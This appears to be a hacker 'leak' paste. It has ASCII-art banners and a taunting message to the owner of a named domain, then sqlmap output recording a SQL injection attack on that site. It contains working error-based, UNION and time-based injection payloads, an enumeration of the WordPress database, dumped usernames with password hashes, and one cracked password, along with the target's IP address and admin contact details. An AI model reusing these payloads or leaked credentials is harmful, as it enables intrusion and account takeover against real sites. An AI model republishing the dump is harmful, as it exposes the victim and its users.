+-+-+-+-+-+-+ +-+-+-+-+-+-+

-+-+-+
|N|e|o|N|0|n|1| |&| |T|s
|u|i|c|a|n|3|
+-+-+-+-+-+-+ +-+-+-+-+-+-+
-+-+-+
+-+-+-+-+-+-+ +-+-+-+-+ +-+
-+-+-+
|L|E|A|K|E|D| |Y|O|U|R| |S|
H|I|T|
+-+-+-+-+-+-+ +-+-+-+-+ +-+
-+-+-+
################################################################################
#########################################################
+-+-+-+-+ +-+-+-+-+-+-+-+-+ +-+-+ +-+-+-+
-+-+-+-+-+-+-+-+-+
|Y|o|u|r| |s|e|c|u|r|i|t|y| |i|s| |#|N|o|
n|e|x|i|s|t|e|n|t|
+-+-+-+-+ +-+-+-+-+-+-+-+-+ +-+-+ +-+-+-+
-+-+-+-+-+-+-+-+-+
################################################################################
##########################################################
::::::::::. :::. :::::::::::: .,-::::: :: .:
.-:.
::-. ...
..
.
::::::::::..
.::::::. :: .: :::::::::::::::
`;;;```.;;;;;`;;;;;;;;;;'''',;;;'````' ,;; ;;,
';;. ;;;;'.;;;;;;;. ;;
;;;;;;;``;;;;
;;;`
` ,;; ;;, ;;;;;;;;;;;''''
`]]nnn]]',[[ '[[, [[
[[[
,[[[,,,[[[
'[[,[[[' ,[[
\[[,[['
[[[ [[[,/[[['
'[==/[[[[,,[[[,,,[[[ [[[
[[
$$$"" c$$$cc$$$c $$
$$$
"$$$"""$$$
c$$" $$$,
$$$$$
$$$ $$$$$$c
'''
$"$$$"""$$$ $$$
$$
888o
888 888, 88,
`88bo,__,o, 888 "88o
,8P"`
"888,_ _,88P88
.d888 888b "88bo, 88b
dP 888 "88o888
88,
YMMMb YMM ""` MMM
"YUMMMMMP"MMM
YMM
mM"
"YMMMMMP" "Y
mmMMMM"" MMMM "W"
"YMmMY" MMM
YMMMMM
MMM
################################################################################
###########################################################
||T |||A |||R |||G |||E |||T ||
||__|||__|||__|||__|||__|||__||
|/__\|/__\|/__\|/__\|/__\|/__\|
============================================
OMNIS NETWORK, LLC
Domain Name: malcolmx.com
============================================
================IP Address==================
--------------142.54.227.78----------------============================================
============================================
============================================
To The Webmaster of Omnia Network, LLC
We found holes everywhere. You may want to
patch your shit, or learn network security
or find a different occupation. Your shit
is weak.
With love NeoN0n1 & Tsuican3
============================================
-----------------dump-----------------------

============================================
Domain Name: malcolmx.com
Domain ID: d440434
Admin Organization: CMG Worldwide, Inc.
Admin Street: 10500 Crosspoint Blvd.
Admin City: Indianapolis
Admin State/Province: IN
Admin Postal Code: 46256
Admin Country: US
Admin Phone: +1.3175705000
Admin Phone Ext:
Admin Fax: +1.3175705500
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=546' AND (SELECT 3075 FROM(SELECT COUNT(*),CONCAT(0x7170686171,(
SELECT (CASE WHEN (3075=3075) THEN 1 ELSE 0 END)),0x7179767871,FLOOR(RAND(0)*2))
x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'XEXQ'='XEXQ
Type: UNION query
Title: MySQL UNION query (NULL) - 23 columns
Payload: id=546' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706861
71,0x70526f714b4c4a6a4b54,0x7179767871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=546' AND SLEEP(5) AND 'abBJ'='abBJ
--[19:39:41] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[19:39:41] [INFO] fetching database names
available databases [2]:
[*] headline_word
[*] information_schema
Database: headline_word
[15 tables]
+------------------------+
| wp_commentmeta
|
| wp_comments
|
| wp_groups_rs
|
| wp_links
|
| wp_options
|
| wp_postmeta
|
| wp_posts
|
| wp_role_scope_rs
|
| wp_term_relationships |
| wp_term_taxonomy
|
| wp_terms
|
| wp_user2group_rs
|
| wp_user2role2object_rs |
| wp_usermeta
|
| wp_users
|
+------------------------+
[19:45:46] [INFO] fetching columns for table 'wp_users' in database 'headline_wo
rd'
Database: headline_word
Table: wp_users
[10 columns]
+---------------------+---------------------+

| Column
| Type
|
+---------------------+---------------------+
| display_name
| varchar(250)
|
| ID
| bigint(20) unsigned |
| user_activation_key | varchar(60)
|
| user_email
| varchar(100)
|
| user_login
| varchar(60)
|
| user_nicename
| varchar(50)
|
| user_pass
| varchar(64)
|
| user_registered
| datetime
|
| user_status
| int(11)
|
| user_url
| varchar(100)
|
+---------------------+---------------------+
[19:49:13] [INFO] fetching columns 'user_login, user_pass' for table 'wp_users'
in database 'headline_word'
[19:49:14] [INFO] fetching entries of column(s) 'user_login, user_pass' for tabl
e 'wp_users' in database 'headline_word'
[19:49:15] [INFO] analyzing table dump for possible password hashes
[19:49:15] [INFO] recognized possible password hashes in column 'user_pass'
do you want to store hashes to a temporary file for eventual further processing
with other tools [y/N] n
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[19:49:33] [INFO] using hash method 'wordpress_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/smalldict.txt' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[19:49:42] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] n
[19:49:50] [INFO] starting dictionary-based cracking (wordpress_passwd)
[19:49:50] [INFO] starting 2 processes
[19:49:51] [INFO] cracked password '123456' for hash '$P$BJlHN6nez78iOL9H50tAHCz
edjczJO1'
[19:51:04] [INFO] postprocessing table dump
Database: headline_word
Table: wp_users
[4 entries]
+---------------------------------------------+------------+
| user_pass
| user_login |
+---------------------------------------------+------------+
| $P$BqHQQIYKgIE2qbOaE0rjndQg3yKeH/.
| admin
|
| $P$BROQQ5KbbL..EwY.7BFVf/1Ejv6uhp1
| headlines |
| $P$BJlHN6nez78iOL9H50tAHCzedjczJO1 (123456) | clare
|
| $P$BieluSUnGw3yDJkjEtQuK02W7HUqrm.
| \\?a0
|
+---------------------------------------------+------------+